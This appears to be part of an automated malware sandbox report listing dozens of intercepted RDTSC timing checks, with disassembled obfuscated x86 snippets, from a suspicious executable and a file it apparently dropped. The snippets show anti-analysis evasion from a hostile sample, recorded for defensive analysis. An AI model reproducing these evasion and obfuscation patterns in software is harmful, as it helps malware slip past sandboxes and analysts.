Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8D968 second address: C8D977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F702D6C0E46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C94C5B second address: C94C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C93B4B second address: C93B67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C93B67 second address: C93B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F702C87CB9Eh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C93B7B second address: C93B85 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F702D6C0E46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C93B85 second address: C93BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F702C87CB9Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jl 00007F702C87CBBDh 0x00000014 push eax 0x00000015 push edx 0x00000016 jng 00007F702C87CB96h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C996B6 second address: C996D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E59h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C996D8 second address: C996DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C996DE second address: C996E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9929C second address: C992A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F702C87CB96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA36C6 second address: CA36EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F702D6C0E53h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F702D6C0E4Bh 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA36EE second address: CA36F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA36F2 second address: CA36FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA9598 second address: CA95A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA95A0 second address: CA95A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB8A31 second address: CB8A35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB8A35 second address: CB8A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBCE63 second address: CBCE68 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBCE68 second address: CBCE9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F702D6C0E46h 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F702D6C0E59h 0x00000014 jmp 00007F702D6C0E4Ah 0x00000019 popad 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD2E8D second address: CD2E92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD3037 second address: CD303B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD31A8 second address: CD31AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD31AC second address: CD31B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD31B2 second address: CD31C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F702C87CBA0h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD39A7 second address: CD39AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD6BC0 second address: CD6BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD6BC4 second address: CD6BC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD94DC second address: CD94E1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD97B3 second address: CD97B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD99D7 second address: CD9A03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702C87CBA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 jp 00007F702C87CB96h 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD9A03 second address: CD9A08 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD9A08 second address: CD9A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F702C87CB98h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 jmp 00007F702C87CBA4h 0x00000027 jmp 00007F702C87CB9Ah 0x0000002c push dword ptr [ebp+122D184Fh] 0x00000032 mov dx, si 0x00000035 push 2C2B84EEh 0x0000003a push eax 0x0000003b push edx 0x0000003c jnp 00007F702C87CB98h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDB2FA second address: CDB313 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F702D6C0E46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F702D6C0E4Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDB313 second address: CDB368 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F702C87CBA0h 0x00000008 jmp 00007F702C87CBA0h 0x0000000d jbe 00007F702C87CB96h 0x00000013 popad 0x00000014 jmp 00007F702C87CBA5h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jo 00007F702C87CB96h 0x00000024 push edi 0x00000025 pop edi 0x00000026 push eax 0x00000027 pop eax 0x00000028 jl 00007F702C87CB96h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDB368 second address: CDB372 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F702D6C0E4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDCDD3 second address: CDCDD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54602F8 second address: 54602FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54602FC second address: 5460302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460446 second address: 546047D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F702D6C0E57h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546047D second address: 546048F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546048F second address: 5460493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460493 second address: 54604A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702C87CB9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54605B8 second address: 5460615 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e mov bl, F1h 0x00000010 pushfd 0x00000011 jmp 00007F702D6C0E50h 0x00000016 jmp 00007F702D6C0E55h 0x0000001b popfd 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f jmp 00007F702D6C0E51h 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b mov edx, 22D7C540h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460615 second address: 546069C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F702C87CBA9h 0x00000008 add ax, C146h 0x0000000d jmp 00007F702C87CBA1h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 pop eax 0x00000017 jmp 00007F702C87CB9Dh 0x0000001c call 00007F709C21052Fh 0x00000021 push 74DF27D0h 0x00000026 push dword ptr fs:[00000000h] 0x0000002d mov eax, dword ptr [esp+10h] 0x00000031 mov dword ptr [esp+10h], ebp 0x00000035 lea ebp, dword ptr [esp+10h] 0x00000039 sub esp, eax 0x0000003b push ebx 0x0000003c push esi 0x0000003d push edi 0x0000003e mov eax, dword ptr [74E80140h] 0x00000043 xor dword ptr [ebp-04h], eax 0x00000046 xor eax, ebp 0x00000048 push eax 0x00000049 mov dword ptr [ebp-18h], esp 0x0000004c push dword ptr [ebp-08h] 0x0000004f mov eax, dword ptr [ebp-04h] 0x00000052 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000059 mov dword ptr [ebp-08h], eax 0x0000005c lea eax, dword ptr [ebp-10h] 0x0000005f mov dword ptr fs:[00000000h], eax 0x00000065 ret 0x00000066 jmp 00007F702C87CB9Eh 0x0000006b and dword ptr [ebp-04h], 00000000h 0x0000006f jmp 00007F702C87CBA0h 0x00000074 mov edx, dword ptr [ebp+0Ch] 0x00000077 push eax 0x00000078 push edx 0x00000079 jmp 00007F702C87CBA7h 0x0000007e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546069C second address: 54606FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, edx 0x0000000b pushad 0x0000000c movzx ecx, bx 0x0000000f movsx edx, ax 0x00000012 popad 0x00000013 mov al, byte ptr [edx] 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F702D6C0E4Eh 0x0000001c adc ax, 9038h 0x00000021 jmp 00007F702D6C0E4Bh 0x00000026 popfd 0x00000027 mov ecx, 7FCEA66Fh 0x0000002c popad 0x0000002d inc edx 0x0000002e pushad 0x0000002f mov edi, eax 0x00000031 mov ebx, ecx 0x00000033 popad 0x00000034 test al, al 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54606FB second address: 54606FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54606FF second address: 546071A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546071A second address: 54606FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702C87CBA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F702C87CB1Ch 0x0000000f mov al, byte ptr [edx] 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F702C87CB9Eh 0x00000018 adc ax, 9038h 0x0000001d jmp 00007F702C87CB9Bh 0x00000022 popfd 0x00000023 mov ecx, 7FCEA66Fh 0x00000028 popad 0x00000029 inc edx 0x0000002a pushad 0x0000002b mov edi, eax 0x0000002d mov ebx, ecx 0x0000002f popad 0x00000030 test al, al 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460798 second address: 546081F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 movsx edi, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c lea ebx, dword ptr [edi+01h] 0x0000000f jmp 00007F702D6C0E4Ah 0x00000014 mov al, byte ptr [edi+01h] 0x00000017 pushad 0x00000018 mov cl, B9h 0x0000001a mov al, bl 0x0000001c popad 0x0000001d inc edi 0x0000001e pushad 0x0000001f mov esi, ebx 0x00000021 popad 0x00000022 test al, al 0x00000024 jmp 00007F702D6C0E59h 0x00000029 jne 00007F709D0490EBh 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F702D6C0E4Ch 0x00000036 jmp 00007F702D6C0E55h 0x0000003b popfd 0x0000003c popad 0x0000003d mov ecx, edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F702D6C0E54h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546081F second address: 5460825 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460825 second address: 5460890 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F702D6C0E4Ch 0x00000008 pushfd 0x00000009 jmp 00007F702D6C0E52h 0x0000000e adc eax, 4B8E9F28h 0x00000014 jmp 00007F702D6C0E4Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d shr ecx, 02h 0x00000020 jmp 00007F702D6C0E56h 0x00000025 rep movsd 0x00000027 rep movsd 0x00000029 rep movsd 0x0000002b rep movsd 0x0000002d rep movsd 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F702D6C0E57h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460890 second address: 5460896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460896 second address: 546089A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546089A second address: 546089E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546089E second address: 54608D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, edx 0x0000000a jmp 00007F702D6C0E57h 0x0000000f and ecx, 03h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F702D6C0E55h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54608D9 second address: 54608DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54608DF second address: 54608FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rep movsb 0x0000000a pushad 0x0000000b movsx edx, ax 0x0000000e mov dx, si 0x00000011 popad 0x00000012 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54608FE second address: 5460902 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460902 second address: 5460908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460908 second address: 5460952 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702C87CB9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, ebx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F702C87CB9Eh 0x00000012 adc eax, 0224B638h 0x00000018 jmp 00007F702C87CB9Bh 0x0000001d popfd 0x0000001e popad 0x0000001f mov ecx, dword ptr [ebp-10h] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F702C87CBA0h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460952 second address: 546096E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr fs:[00000000h], ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546096E second address: 5460974 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460974 second address: 54609E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F702D6C0E4Eh 0x00000011 sbb cx, 7228h 0x00000016 jmp 00007F702D6C0E4Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F702D6C0E58h 0x00000022 add ch, FFFFFF88h 0x00000025 jmp 00007F702D6C0E4Bh 0x0000002a popfd 0x0000002b popad 0x0000002c pop edi 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F702D6C0E50h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54609E2 second address: 54609F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702C87CB9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54609F1 second address: 5460A15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460A15 second address: 5460A1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460A1B second address: 5460A48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 4709D0B7h 0x00000008 pushfd 0x00000009 jmp 00007F702D6C0E4Ch 0x0000000e add al, FFFFFFA8h 0x00000011 jmp 00007F702D6C0E4Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460A48 second address: 5460A4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460A4C second address: 5460AB0 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F702D6C0E50h 0x00000008 and eax, 7ED8CE08h 0x0000000e jmp 00007F702D6C0E4Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jmp 00007F702D6C0E58h 0x0000001b popad 0x0000001c leave 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F702D6C0E4Eh 0x00000024 adc cl, FFFFFF98h 0x00000027 jmp 00007F702D6C0E4Bh 0x0000002c popfd 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460AB0 second address: 54605B8 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 176Bh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 retn 0008h 0x0000000c cmp dword ptr [ebp-2Ch], 10h 0x00000010 mov eax, dword ptr [ebp-40h] 0x00000013 jnc 00007F702C87CB95h 0x00000015 push eax 0x00000016 lea edx, dword ptr [ebp-00000590h] 0x0000001c push edx 0x0000001d call esi 0x0000001f push 00000008h 0x00000021 jmp 00007F702C87CBA0h 0x00000026 call 00007F702C87CB99h 0x0000002b jmp 00007F702C87CBA0h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F702C87CB9Eh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460B91 second address: 5460BA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F702D6C0E4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460BA4 second address: 5460C16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F702C87CB9Fh 0x00000009 adc esi, 2D42E14Eh 0x0000000f jmp 00007F702C87CBA9h 0x00000014 popfd 0x00000015 mov si, 8157h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esp], ebp 0x0000001f jmp 00007F702C87CB9Ah 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F702C87CB9Dh 0x0000002f and ah, 00000036h 0x00000032 jmp 00007F702C87CBA1h 0x00000037 popfd 0x00000038 push eax 0x00000039 pop edx 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 863DA3 second address: 863DC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 je 00007F702D6C0E46h 0x0000000d popad 0x0000000e push esi 0x0000000f jmp 00007F702D6C0E54h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 86DE97 second address: 86DEA7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F702C87CB96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 86DEA7 second address: 86DEAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 86E030 second address: 86E034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 86E034 second address: 86E052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F702D6C0E58h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\DocumentsGDHIDHIEGI.exe	RDTSC instruction interceptor: First address: 86E052 second address: 86E05E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F702C87CB96h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
